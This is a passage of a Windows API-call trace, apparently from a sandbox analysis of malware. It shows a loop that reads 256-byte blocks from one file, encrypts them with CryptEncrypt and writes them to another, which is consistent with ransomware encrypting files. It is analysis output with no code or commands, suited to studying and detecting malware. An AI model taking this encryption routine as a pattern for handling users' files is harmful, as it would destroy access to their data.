lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.274] GetLastError () returned 0x0 [0165.274] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.274] GetLastError () returned 0x0 [0165.274] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.275] GetLastError () returned 0x0 [0165.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.275] GetLastError () returned 0x0 [0165.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.275] GetLastError () returned 0x0 [0165.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.275] GetLastError () returned 0x0 [0165.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.275] GetLastError () returned 0x0 [0165.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.275] GetLastError () returned 0x0 [0165.275] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.275] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.276] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.276] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.276] GetLastError () returned 0x0 [0165.276] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.277] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.277] GetLastError () returned 0x0 [0165.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.277] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.277] GetLastError () returned 0x0 [0165.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.277] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.277] GetLastError () returned 0x0 [0165.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.277] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.277] GetLastError () returned 0x0 [0165.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.277] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.277] GetLastError () returned 0x0 [0165.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.277] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.277] GetLastError () returned 0x0 [0165.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.278] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.278] GetLastError () returned 0x0 [0165.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.279] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.279] GetLastError () returned 0x0 [0165.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.279] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.279] GetLastError () returned 0x0 [0165.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.279] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.279] GetLastError () returned 0x0 [0165.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.279] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.279] GetLastError () returned 0x0 [0165.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 